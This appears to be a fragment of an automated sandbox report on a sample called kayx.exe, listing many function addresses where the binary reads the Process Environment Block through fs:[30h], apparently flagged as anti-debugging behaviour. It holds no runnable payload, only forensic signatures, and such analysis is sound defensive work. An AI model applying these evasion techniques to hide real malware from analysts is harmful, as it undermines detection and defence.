Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3F0BF mov eax, dword ptr fs:[00000030h]	17_2_00E3F0BF
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E09080 mov eax, dword ptr fs:[00000030h]	17_2_00E09080
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E83884 mov eax, dword ptr fs:[00000030h]	17_2_00E83884
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E83884 mov eax, dword ptr fs:[00000030h]	17_2_00E83884
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED1074 mov eax, dword ptr fs:[00000030h]	17_2_00ED1074
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC2073 mov eax, dword ptr fs:[00000030h]	17_2_00EC2073
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E20050 mov eax, dword ptr fs:[00000030h]	17_2_00E20050
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E20050 mov eax, dword ptr fs:[00000030h]	17_2_00E20050
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]	17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]	17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]	17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h]	17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]	17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]	17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]	17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]	17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h]	17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]	17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]	17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]	17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h]	17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED4015 mov eax, dword ptr fs:[00000030h]	17_2_00ED4015
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED4015 mov eax, dword ptr fs:[00000030h]	17_2_00ED4015
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h]	17_2_00E87016
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h]	17_2_00E87016
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h]	17_2_00E87016
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]	17_2_00E0B1E1
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]	17_2_00E0B1E1
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]	17_2_00E0B1E1
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E941E8 mov eax, dword ptr fs:[00000030h]	17_2_00E941E8
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E361A0 mov eax, dword ptr fs:[00000030h]	17_2_00E361A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E361A0 mov eax, dword ptr fs:[00000030h]	17_2_00E361A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]	17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]	17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]	17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h]	17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E869A6 mov eax, dword ptr fs:[00000030h]	17_2_00E869A6
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]	17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]	17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]	17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h]	17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2C182 mov eax, dword ptr fs:[00000030h]	17_2_00E2C182
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3A185 mov eax, dword ptr fs:[00000030h]	17_2_00E3A185
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E32990 mov eax, dword ptr fs:[00000030h]	17_2_00E32990
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0C962 mov eax, dword ptr fs:[00000030h]	17_2_00E0C962
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0B171 mov eax, dword ptr fs:[00000030h]	17_2_00E0B171
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0B171 mov eax, dword ptr fs:[00000030h]	17_2_00E0B171
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2B944 mov eax, dword ptr fs:[00000030h]	17_2_00E2B944
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2B944 mov eax, dword ptr fs:[00000030h]	17_2_00E2B944
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]	17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]	17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]	17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h]	17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E24120 mov ecx, dword ptr fs:[00000030h]	17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3513A mov eax, dword ptr fs:[00000030h]	17_2_00E3513A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3513A mov eax, dword ptr fs:[00000030h]	17_2_00E3513A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h]	17_2_00E09100
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h]	17_2_00E09100
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h]	17_2_00E09100
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E32AE4 mov eax, dword ptr fs:[00000030h]	17_2_00E32AE4
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E32ACB mov eax, dword ptr fs:[00000030h]	17_2_00E32ACB
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]	17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]	17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]	17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]	17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h]	17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1AAB0 mov eax, dword ptr fs:[00000030h]	17_2_00E1AAB0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1AAB0 mov eax, dword ptr fs:[00000030h]	17_2_00E1AAB0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3FAB0 mov eax, dword ptr fs:[00000030h]	17_2_00E3FAB0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3D294 mov eax, dword ptr fs:[00000030h]	17_2_00E3D294
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3D294 mov eax, dword ptr fs:[00000030h]	17_2_00E3D294
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EBB260 mov eax, dword ptr fs:[00000030h]	17_2_00EBB260
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EBB260 mov eax, dword ptr fs:[00000030h]	17_2_00EBB260
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED8A62 mov eax, dword ptr fs:[00000030h]	17_2_00ED8A62
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E4927A mov eax, dword ptr fs:[00000030h]	17_2_00E4927A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]	17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]	17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]	17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h]	17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECEA55 mov eax, dword ptr fs:[00000030h]	17_2_00ECEA55
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E94257 mov eax, dword ptr fs:[00000030h]	17_2_00E94257
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E44A2C mov eax, dword ptr fs:[00000030h]	17_2_00E44A2C
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E44A2C mov eax, dword ptr fs:[00000030h]	17_2_00E44A2C
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]	17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]	17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]	17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]	17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]	17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]	17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]	17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]	17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h]	17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E18A0A mov eax, dword ptr fs:[00000030h]	17_2_00E18A0A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h]	17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E05210 mov ecx, dword ptr fs:[00000030h]	17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h]	17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h]	17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0AA16 mov eax, dword ptr fs:[00000030h]	17_2_00E0AA16
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0AA16 mov eax, dword ptr fs:[00000030h]	17_2_00E0AA16
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECAA16 mov eax, dword ptr fs:[00000030h]	17_2_00ECAA16
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECAA16 mov eax, dword ptr fs:[00000030h]	17_2_00ECAA16
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E23A1C mov eax, dword ptr fs:[00000030h]	17_2_00E23A1C
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]	17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]	17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]	17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]	17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]	17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h]	17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2DBE9 mov eax, dword ptr fs:[00000030h]	17_2_00E2DBE9
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E853CA mov eax, dword ptr fs:[00000030h]	17_2_00E853CA
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E853CA mov eax, dword ptr fs:[00000030h]	17_2_00E853CA
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED5BA5 mov eax, dword ptr fs:[00000030h]	17_2_00ED5BA5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h]	17_2_00E34BAD
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h]	17_2_00E34BAD
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h]	17_2_00E34BAD
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC138A mov eax, dword ptr fs:[00000030h]	17_2_00EC138A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EBD380 mov ecx, dword ptr fs:[00000030h]	17_2_00EBD380
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E11B8F mov eax, dword ptr fs:[00000030h]	17_2_00E11B8F
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E11B8F mov eax, dword ptr fs:[00000030h]	17_2_00E11B8F
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3B390 mov eax, dword ptr fs:[00000030h]	17_2_00E3B390
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E32397 mov eax, dword ptr fs:[00000030h]	17_2_00E32397
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0DB60 mov ecx, dword ptr fs:[00000030h]	17_2_00E0DB60
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E33B7A mov eax, dword ptr fs:[00000030h]	17_2_00E33B7A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E33B7A mov eax, dword ptr fs:[00000030h]	17_2_00E33B7A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0DB40 mov eax, dword ptr fs:[00000030h]	17_2_00E0DB40
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED8B58 mov eax, dword ptr fs:[00000030h]	17_2_00ED8B58
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0F358 mov eax, dword ptr fs:[00000030h]	17_2_00E0F358
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC131B mov eax, dword ptr fs:[00000030h]	17_2_00EC131B
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC14FB mov eax, dword ptr fs:[00000030h]	17_2_00EC14FB
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h]	17_2_00E86CF0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h]	17_2_00E86CF0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h]	17_2_00E86CF0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED8CD6 mov eax, dword ptr fs:[00000030h]	17_2_00ED8CD6
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1849B mov eax, dword ptr fs:[00000030h]	17_2_00E1849B
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2746D mov eax, dword ptr fs:[00000030h]	17_2_00E2746D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3A44B mov eax, dword ptr fs:[00000030h]	17_2_00E3A44B
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E9C450 mov eax, dword ptr fs:[00000030h]	17_2_00E9C450
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E9C450 mov eax, dword ptr fs:[00000030h]	17_2_00E9C450
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3BC2C mov eax, dword ptr fs:[00000030h]	17_2_00E3BC2C
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h]	17_2_00ED740D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h]	17_2_00ED740D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h]	17_2_00ED740D
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]	17_2_00E86C0A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]	17_2_00E86C0A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]	17_2_00E86C0A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h]	17_2_00E86C0A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]	17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1D5E0 mov eax, dword ptr fs:[00000030h]	17_2_00E1D5E0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E1D5E0 mov eax, dword ptr fs:[00000030h]	17_2_00E1D5E0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]	17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]	17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]	17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]	17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EB8DF1 mov eax, dword ptr fs:[00000030h]	17_2_00EB8DF1
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]	17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]	17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]	17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86DC9 mov ecx, dword ptr fs:[00000030h]	17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]	17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]	17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h]	17_2_00ED05AC
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h]	17_2_00ED05AC
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E335A1 mov eax, dword ptr fs:[00000030h]	17_2_00E335A1
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]	17_2_00E31DB5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]	17_2_00E31DB5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]	17_2_00E31DB5
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]	17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]	17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]	17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]	17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]	17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]	17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]	17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]	17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]	17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h]	17_2_00E3FD9B
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h]	17_2_00E3FD9B
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h]	17_2_00E2C577
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h]	17_2_00E2C577
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E43D43 mov eax, dword ptr fs:[00000030h]	17_2_00E43D43
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E83540 mov eax, dword ptr fs:[00000030h]	17_2_00E83540
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00EB3D40 mov eax, dword ptr fs:[00000030h]	17_2_00EB3D40
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E27D50 mov eax, dword ptr fs:[00000030h]	17_2_00E27D50
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E0AD30 mov eax, dword ptr fs:[00000030h]	17_2_00E0AD30
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]	17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ECE539 mov eax, dword ptr fs:[00000030h]	17_2_00ECE539
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]	17_2_00E34D3B
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]	17_2_00E34D3B
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]	17_2_00E34D3B
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00ED8D34 mov eax, dword ptr fs:[00000030h]	17_2_00ED8D34
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E8A537 mov eax, dword ptr fs:[00000030h]	17_2_00E8A537
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E316E0 mov ecx, dword ptr fs:[00000030h]	17_2_00E316E0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E176E2 mov eax, dword ptr fs:[00000030h]	17_2_00E176E2
